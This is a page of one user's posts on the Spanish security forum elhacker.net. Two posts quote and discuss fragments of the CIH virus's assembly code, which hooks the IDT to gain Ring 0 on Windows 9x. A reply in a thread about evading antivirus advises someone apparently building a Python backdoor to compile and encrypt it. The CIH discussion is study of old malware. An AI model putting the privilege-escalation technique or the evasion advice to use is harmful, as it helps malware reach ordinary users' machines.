elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 [13] 14 15 16 17 18 19 20 21 22 23
121  Informática / Hardware / Re: ¿Existe algun emu8086 para la arquitectura IA-32? en: 9 Agosto 2020, 21:55 pm
En Windows 10 he tenido problemas con la instalación de las herramientas, pero puedo preparar un portable y subir el curso original, dame una hora y lo preparo

Muchas gracias. Estaba buscando algo asi desde hace bastante aunque no se me habia ocurrido mencionarlo en el foro.

Gracias por tu respuesta y por tu esfuerzo. Saludos.
122  Informática / Hardware / ¿Existe algun emu8086 para la arquitectura IA-32? en: 9 Agosto 2020, 17:01 pm
Hola, me preguntaba si alguien conoce algun emulador parecido al conocido emu8086 de la arquitectura IA-32, ya que lo he estado buscando, sin embargo no encuentro mas que maquinas virtuales, cuando yo busco algo mas orientado a la depuracion y la versatilidad que ofrece esta herramienta.

Gracias de antemano y saludos.
123  Seguridad Informática / Análisis y Diseño de Malware / Re: Rasomware Caleb. Equipo secuestrado y me piden recompensa en bitcoins en: 9 Agosto 2020, 14:55 pm
Otra buena razon para hacer un backup semanal.
124  Seguridad Informática / Análisis y Diseño de Malware / Re: Obtencion de Ring 0 por parte del virus CIH en Windows 9x. en: 9 Agosto 2020, 14:36 pm
Lo que hace es obtener el puntero a la estructura de IDT y luego añadir el offset de la interrupción deseada (HookExceptionNumber) para llegar a la subestructura de la interrupción.

Claro... pero, ¿no te paree curioso que añada 4 sin razon alguna?:
Código
  1. add ebx, HookExceptionNumber*08h+04h
Tienes la base de la IDT en EBX. Le sumas cuantas IDTs hayan en el camino hasta el descriptor objetivo (cuantia que se expresa como HookExceptionNumber*8) y ya esta; no es necesario sumar 4. A partir de aqui comienza mi confusion.

Saludos.
125  Seguridad Informática / Análisis y Diseño de Malware / Instruccion SIDT y el virus CIH. en: 9 Agosto 2020, 14:32 pm
Hola,
Tengo una duda un poco tonta que me esta rompiendo la cabeza... el virus CIH, para obtener privilegios del sistema, altera la IDT y modifica la entrada de una excepcion que luego ocasiona. Sin embargo, ¿no son, tanto las instrucciones SIDT y LIDT privilegiadas de antemano? es decir, ¿como el virus accede a la IDT cuando es un simple EXE en modo usuario?:

Citar
MyVirusStart:
push ebp

; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error *
; * Occurrence, Especially in NT. *
; *************************************

lea eax, [esp-04h*2]

xor ebx, ebx
xchg eax, fs:[ebx]

call @0
@0:
pop ebx

lea ecx, StopToRunVirusCode-@0[ebx]
push ecx

push eax

; *************************************
; * Let's Modify *
; * IDT(Interrupt Descriptor Table) *
; * to Get Ring0 Privilege... *
; *************************************

push eax ;
sidt [esp-02h] ; Get IDT Base Address
pop ebx;

add ebx, HookExceptionNumber*08h+04h ; ZF = 0

cli

mov ebp, [ebx] ;
mov bp, [ebx-04h] ; Entry Point

lea esi, MyExceptionHook-@1[ecx]

;...
126  Seguridad Informática / Análisis y Diseño de Malware / Re: Evitar los antivirus y/o desactivarlos en: 7 Agosto 2020, 12:38 pm
A que en C si te lo detecta... :silbar:
Prueba compilandolo. Aunque eso tal vez lo haga mas detectable... es cuestion de firmas (y herustica).

https://www.tutorialspoint.com/What-are-pyc-files-in-Python

PD: puedes encontrar formas en Internet de construir EXEs a partir de scripts de Python. Lo que mejor se me ocurre a priori es hacerlo y en seguida cifrarlos. Puedes encontrar crypters en todas partes, aunque estarias saliendo de Guatemala y entrando a Guatepeor. Te recomiendo leer la documentacion de Windows para tratar con modulos ejecutables y hacerlo tu mismo.

Saludos.


(Ademas, el ambito de infeccion de un backdoor -pues es mas un backdoor que un troyano- escrito en Python se reduce a ciertos servidores y la mayoria de usuarios con Linux, y aparentemente tu objetivo es el usuario tipico. Esto a menos que incluyas una utilidad para instalar Python de antemano, lo cual, sinceramente, a mi me parece ineficiente).
127  Seguridad Informática / Análisis y Diseño de Malware / Obtencion de Ring 0 por parte del virus CIH en Windows 9x. en: 7 Agosto 2020, 12:25 pm
Hola,
Hace poco descargue el codigo fuente del virus CIH para entenderlo, pues me parece interesante. Sin embargo me encontre con una parte de el que no entiendo muy bien, como era de esperarse...

Código
  1. ; *************************************
  2. ; * Let's Modify *
  3. ; * IDT(Interrupt Descriptor Table) *
  4. ; * to Get Ring0 Privilege... *
  5. ; *************************************
  6.  
  7. push eax ;
  8. sidt [esp-02h] ; Get IDT Base Address
  9. pop ebx ;
  10.  
  11. add ebx, HookExceptionNumber*08h+04h ; ZF = 0
  12.  
  13. cli
  14.  
  15. mov ebp, [ebx] ; Get Exception Base
  16. mov bp, [ebx-04h] ; Entry Point
  17.  
  18. lea esi, MyExceptionHook-@1[ecx]
  19.  
  20. push esi
  21.  
  22. mov [ebx-04h], si ;
  23. shr esi, 16 ; Modify Exception
  24. mov [ebx+02h], si ; Entry Point Address
  25.  
  26. pop esi

El comentario es bastante descriptivo. Sin duda suficiente para entender el objetivo, sin embargo el medio en si que utiliza en toda profundidad no lo entiendo plenamente:

Código
  1. push eax ;
  2. sidt [esp-02h] ; Get IDT Base Address
  3. pop ebx ;
Aparentemente esta metiendo a EAX en la pila para luego, en sidt [esp-02h], introducir la base de la IDT en EBX pero, ¿por que resta 2? ¿no deberia mas bien sumar 4? recordemos que los valores en la medida que son antiguos en la pila, se encuentran en posiciones de memoria mas altas y, en este caso, hablando de un registro de 4 bytes, precisamente 4 posiciones mas alto.

Código
  1. mov ebp, [ebx] ; Get Exception Base
  2. mov bp, [ebx-04h] ; Entry Point
Esto no es nada evidente para mi. ¿Mueve, aparentemente, el Entry Point del IDT HookExceptionNumber a ebp, y luego lo que sea que se encuentre 4 bytes antes del mismo en los 16 bits menos significativos de EBP? ¿que sentido tiene?

Código
  1. lea esi, MyExceptionHook-@1[ecx]
Ahora, mas evidentemente mueve el desplazamiento del hook a ESI. Sin embargo, ¿que es -@1[ecx]? ¿alguna forma de relocalizacion? No lo entiendo en absoluto. Aun no he aprendido esa sintaxis... ¿alguien tiene idea de al menos como se llama?

Código
  1. mov [ebx-04h], si ;
  2. shr esi, 16 ; Modify Exception
  3. mov [ebx+02h], si ; Entry Point Address
Mueve a esa misteriosa direccion (EBX-04) el desplazamiento antes mencionado... ¿alguien tiene idea de que hay en los anteriores 4 bytes a un IDT? (evidentemente otro IDT, pero la pregunta es ironica, quiero decir, ¿alguien sabe por que?)

Eso es todo... estoy un poco enredado.
Saludos.
128  Seguridad Informática / Análisis y Diseño de Malware / Re: Spectre Rootkit - Source en: 7 Agosto 2020, 12:06 pm
Gracias por compartirlo.
129  Sistemas Operativos / Windows / Re: Esquema (casi) completo del formato PE de Windows. en: 3 Agosto 2020, 17:38 pm
No oigo nada.
gira a 2 m/s y yo necesito más velocidad

Pense que llegabas, al menos, a los 343...  :silbar:




https://www.google.com/search?client=marax;)&q=velocidad+del+sonido
130  Sistemas Operativos / Windows / Re: Alternativa a las Virtual Keys de Windows. en: 2 Agosto 2020, 14:35 pm
Una app novedosa ...
No es una rueda. Es mi rueda.  :rolleyes:
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 [13] 14 15 16 17 18 19 20 21 22 23
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines